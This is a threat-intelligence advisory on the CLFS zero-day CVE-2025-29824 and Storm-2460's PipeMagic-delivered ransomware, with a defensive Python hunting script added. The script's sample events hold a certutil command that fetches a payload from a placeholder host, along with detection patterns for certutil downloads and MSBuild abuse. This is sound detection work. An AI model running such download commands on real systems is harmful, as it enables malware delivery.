Exploitation of CLFS Zero-Day Leads to Ransomware Activity.
Summary:
Microsoft has recently patched a zero-day vulnerability, identified as CVE-2025-29824, which impacts the Windows Common Log File System (CLFS) that was actively exploited in a small number of targeted ransomware attacks. These attacks, tracked under the threat cluster Storm-2460, primarily affected organizations in the IT and real estate sectors in the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia. Exploiting this privilege escalation flaw in CLFS allowed attackers to gain SYSTEM privileges.
The threat actors utilized a plugin-based trojan called PipeMagic, first observed in 2022 and delivered via a malicious MSBuild file, to deploy both the exploit and ransomware payloads. While the initial access vector remains unknown, the attackers were observed using the certutil utility to download malware from a compromised legitimate third-party site. Notably, this is the second Windows zero-day vulnerability delivered via PipeMagic, following CVE-2025-24983. PipeMagic has also been observed being used in Nokoyawa ransomware attacks that leveraged another CLFS zero-day, CVE-2023-28252. Successful exploitation of CVE-2025-29824 involves memory corruption and the utilization of the RtlSetAllBits API to elevate privileges and allow for process injection into SYSTEM processes, followed swiftly by credential extraction and file encryption. Although Microsoft could not obtain a ransomware sample, the ransom note contained a TOR domain linked to the RansomEXX ransomware family. Windows 11, version 24H2, is unaffected by this specific exploit.
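The certutil download and the malicious MSBuild file named above are the two observable host-level behaviours a defender can hunt for. The following is an added example, not code from Microsoft or from this advisory: it classifies constructed process-creation records (the command-line field as a Sysmon Event ID 1 or Windows 4688 event would carry it) and flags certutil used to fetch a URL and MSBuild building a project file from a user-writable path. The events, paths and the "user-writable directory" heuristic are assumptions made for the example.

```python
import re

# Constructed sample process-creation events (not from the advisory).
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "jdoe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -split -f http://compromised.example/payload.bin C:\Users\jdoe\AppData\Local\Temp\p.bin"},
    {"host": "ws01", "user": "jdoe", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\jdoe\AppData\Local\Temp\build.proj"},
    {"host": "build02", "user": "svc_build", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
    {"host": "ws03", "user": "admin", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -hashfile C:\tools\setup.exe SHA256"},
]

# certutil asked to cache a URL: a legitimate certificate tool used as a downloader.
CERTUTIL_DOWNLOAD = re.compile(r"-?urlcache\b.*https?://", re.IGNORECASE)
# Assumed heuristic: project files living under user profiles, Temp or ProgramData
# are not where a build system normally keeps its sources.
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\AppData|Temp|ProgramData)\\", re.IGNORECASE)
# First argument to MSBuild that looks like a project/targets file.
MSBUILD_PROJECT = re.compile(r"(\S+\.(?:proj|csproj|vbproj|xml|targets))", re.IGNORECASE)


def classify(event):
    """Return a detection label for one process-creation event, or None."""
    image = event["image"].lower()
    cmd = event["cmdline"]
    if image.endswith("certutil.exe") and CERTUTIL_DOWNLOAD.search(cmd):
        return "certutil-download"
    if image.endswith("msbuild.exe"):
        match = MSBUILD_PROJECT.search(cmd)
        if match and USER_WRITABLE.search(match.group(1)):
            return "msbuild-user-writable-project"
    return None


def find_suspicious(events):
    """Return (host, label) pairs for every event that matches a rule."""
    hits = []
    for event in events:
        label = classify(event)
        if label:
            hits.append((event["host"], label))
    return hits


if __name__ == "__main__":
    for host, label in find_suspicious(SAMPLE_EVENTS):
        print(f"{host}: {label}")
```

Both rules will fire on some legitimate administration and build activity, so they are hunting leads to triage alongside the parent process and the downloaded file, not blocking rules.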
Security Officer Comments:
The targeting of specific sectors across different geographical regions indicates a potentially sophisticated and targeted campaign. The connection to the RansomEXX ransomware family suggests that Storm-2460 has financially motivated objectives. The ineffectiveness of this particular exploit against the latest version of Windows (11 version 24H2) underscores the security benefits of keeping systems updated. Organizations should prioritize applying the Microsoft Patch Tuesday update to mitigate the risk associated with CVE-2025-29824 and remain vigilant for any suspicious activity indicative of PipeMagic or similar malware. The continued use of CLFS zero-days in ransomware attacks warrants further attention from defenders.
Suggested Corrections:
IOCs are available here.
Microsoft released security updates to address CVE-2025-29824 on April 8, 2025. Customers running Windows 11, version 24H2 are not affected by the observed exploitation, even though the vulnerability was present. Microsoft urges customers to apply these updates as soon as possible.
Microsoft recommends the following mitigations to reduce the impact of activity associated with Storm-2460:
Link(s):
https://www.microsoft.com/en-us/security/blog/2025/04/08/exploitation-of-clfs-zero-day-leads-to-ransomware-activity/
https://www.bleepingcomputer.com/news/security/microsoft-windows-clfs-zero-day-exploited-by-ransomware-gang/